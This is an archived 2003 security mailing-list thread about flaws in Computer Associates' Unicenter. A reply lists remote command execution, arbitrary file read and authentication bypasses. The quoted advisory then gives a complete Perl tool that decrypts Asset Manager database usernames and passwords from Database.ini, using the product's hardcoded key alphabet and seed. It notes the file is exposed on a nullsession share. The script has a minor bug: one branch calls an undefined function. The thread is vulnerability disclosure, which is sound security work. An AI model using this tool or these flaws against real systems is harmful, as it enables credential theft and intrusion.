Re: CA Unicenter Password Recovery Tool

From: Joao Gouveia (tharbad_at_kaotik.org)
Date: 06/04/03

  • Next message: Derek Soeder: "Internet Explorer Object Type Property Overflow"
    To: Tor Houghton <info@kufumo.com>
    Date: 04 Jun 2003 19:21:37 +0100
    

    Hello Tor, all

    While you're at it, you might want to take a look at this. I've came
    across with this vulnerabilities while doing a superficial review on
    CA's TNG Unicenter. Not sure if some of this may afect "Asset Manager"
    or not.

    <quote>

    #1. Remote command execution via file upload (
    http://machine/scripts/file_upload.pl )

    #2. A helpdesk user with no special access rights can read any file on
    the system were the Service desk daemon has access ( by default
    Local/SYSTEM ). The pdmcgi.exe except "templates" as a parameter without
    further security check regarding what type of files can be used as
    "templates".

    #3. pdm_cgireport.exe allows to create and browse any report without
    prior authentication.

    #4. Normal user, who is configured to see only his requests, is able to
    see all requests by manipulating pdmcgi.exe queries.
    </quote>

    AFAIK, all this issues have been fixed, but I have no clue if the fixes
    are public or not. You should contact CA if you feel you might be
    vulnerable.

    Best regards,

    Joao Gouveia
    ------------
    tharbad@kaotik.org

    On Wed, 2003-06-04 at 16:27, Tor Houghton wrote:
    > List,
    >
    > The following can also be found at:
    >
    > http://www.kufumo.com/releases/ca-passwordrecover.txt
    >
    > Thanks,
    >
    > Tor Houghton
    >
    > ;
    >
    > $Id: ca-passwordrecover.txt,v 1.3 2003/05/20 10:46:51 torh Exp $
    >
    > Computer Associates "Asset Manager" Password Recovery Tool
    >
    > (c) 2003 Tor Houghton (th at kufumo dot com)
    >
    >
    > ++Synopsis++
    >
    > The Computer Associates' Unicenter Asset Manager(TM) software uses a stored
    > secret in order to decrypt stored passwords. Attached to this text is a tool
    > to decrypt these passwords.
    >
    >
    > ++What++
    >
    > (http://www3.ca.com/Solutions/Collateral.asp?CID=33237&ID=194)
    >
    > Simply put, it is a data collector with extended privileges. It is comprised
    > of an "Engine" (and a database), one or more "Sectors", a "Console" and an
    > "Agent" for each device (Windows or UNIX) that is to be added to the asset
    > database (see fig 1).
    >
    > [Console] +-------- [Agent]
    > | |
    > v v
    > [Database] <-- [Engine] --> [Sector] <-- [Agent]
    > |
    > +-------> [Sector] <-- [Agent]
    > ^
    > |
    > +-------- [Agent]
    >
    > (figure 1)
    >
    > The arrows do not depict data flow, but transaction flow. For example, the
    > Agents do get data from the Sector (and deliver data to it), but the Agent
    > initiates this transaction.
    >
    > The Engine issues jobs and collects results (both stored on the Sector) and
    > the Agent executes these.
    >
    > On the whole, this looks like a nice design; you could easily firewall the
    > Engine, Console and Database from the rest of the network, for example.
    > However, the Sector is (by default) a NULLSESSION share, writable by anyone.
    >
    > Anyway. This document is not about whether or not it is possible to compromise
    > any machine with an Agent on it through a Sector, but to release a password
    > recovery tool.
    >
    > Here it is.
    >
    > --
    >
    > #!/usr/bin/perl
    > $version='ca-dbpwrecover 1.2 2003/03/19';
    > ##
    > ## (c) th at kufumo.com 2003
    > ##
    > ## this version was based on AMO Unicenter 3.2
    > ##
    > ## thanks to emf at kufumo.com and ssw at kufumo.com for help with the
    > ## disassembly and helping to reverse the encoding algorithm! go daddy!
    > ##
    > ## can't find a suitable file?
    > ##
    > ## (a default installation has the file 'Database.ini' available via a
    > ## nullsession share ("amdomain$") on the machine running the console/
    > ## engine.)
    > ##
    > ##
    > $|=1;
    > ##
    >
    > $ironic_seed="NetCon"; ## we predict $ironic_seed will change
    > ## in the next version of CA AMO etc.
    >
    > $CRYPT="BP7xCtDQqA2EZWoFH6wSIJeMzdYLb9Vfm5uNO4cKRGT3kUX018apyghijlnrsv";
    > $CLEAR="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
    >
    > use Getopt::Long;
    >
    > GetOptions("h",
    > "u=s" => \$uname,
    > "p=s" => \$pword,
    > "f=s" => \$file);
    >
    > if($opt_h) {
    > print <<EOM;
    > $version (c) 2003 th at kufumo.com
    > usage: ca-dbpwrecover [-h] [-u <username>] [-p <passwd>] [-f <file>]
    > -h : this
    > -p : password (if not using files)
    > -u : username (if not using files)
    > -f : filename (e.g. 'ca-dbpwrecover -f Database.ini')
    > EOM
    > exit(1);
    > }
    >
    > if($file) {
    > DecryptCAEncryption("","",$file);
    > } else {
    > if($pword && $uname) {
    > DecryptCADecryption($pword,$uname,"");
    > exit(0);
    > } else {
    > print "Not enough parameters. Try -h.\n";
    > exit(1);
    > }
    > }
    >
    > exit();
    >
    > sub DecryptCAEncryption {
    > my($pword,$uname,$file)=@_;
    >
    > my($u,$c,$oa,$ob,$offset);
    >
    > my(@crypt)=split(//,$CRYPT);
    >
    > if($file) {
    > open(IN,$file) || die "error: failed to open $file: $!\n";
    > while(<IN>) {
    > if(/^UserName=\#(\S+)\s*$/) {$name=$1;}
    > if(/^Password=\#(\S+)\s*$/) {$pass=$1;}
    > }
    > close(IN);
    > }
    >
    > $uname=$name if($name);
    > $pword=$pass if($pass);
    >
    > @pass=split(//,$pword);
    > @user=split(//,$uname);
    >
    > @nc=split(//,$ironic_seed);
    >
    > print "Username: ";
    >
    > $c=5;
    > for($u=0;$u<@user;$u++) {
    >
    > ## find occurrance of current char ($user[$u]) in cleartext
    > ## keystring:
    >
    > $_=$CLEAR;
    >
    > while(m/$user[$u]/g) {
    > $oa=pos;
    > }
    >
    > $oa++;
    >
    > if($u<@nc) {
    > $_=$CRYPT;
    > while(m/$nc[$u]/g) {
    > $ob=pos;
    > }
    > $ob++;
    > $oa=$oa+($ob*-1);
    > } else {
    > $oa=$oa-$u+$c;
    > $c++;
    > }
    >
    > while($oa<0) {
    > $oa=$oa+62;
    > }
    > while($oa>62) {
    > $oa=$oa-62;
    > }
    >
    > $oa--;
    >
    > push(@clear,$crypt[$oa-1-$u]);
    >
    > }
    >
    > foreach(@clear) {
    > print $_;
    > }
    >
    > print "\n";
    >
    > ## who said reuse of code is a good thing?
    > ## i think i failed class here. heck, did you want the tool or not?
    > ##
    >
    > print "Password: ";
    >
    > $c=@clear;
    >
    > for($u=0;$u<@pass;$u++) {
    >
    > ## find occurrance of current char ($user[$u]) in cleartext
    > ## keystring:
    >
    > $_=$CLEAR;
    >
    > while(m/$pass[$u]/g) {
    > $oa=pos;
    > }
    > $oa++;
    >
    > if($u<@clear) {
    > $_=$CRYPT;
    > while(m/$clear[$u]/g) {
    > $ob=pos;
    > }
    > $ob++;
    > $oa=$oa+($ob*-1);
    > } else {
    > $oa=$oa-$u+$c-1;
    > $c++;
    > }
    >
    > while($oa<0) {
    > $oa=$oa+62;
    > }
    > while($oa>62) {
    > $oa=$oa-62;
    > }
    >
    > $oa--;
    >
    > push(@cpass,$crypt[$oa-1-$u]);
    >
    > }
    >
    > foreach(@cpass) {
    > print $_;
    > }
    >
    > print "\n";
    >
    > }

    
    



  • Next message: Derek Soeder: "Internet Explorer Object Type Property Overflow"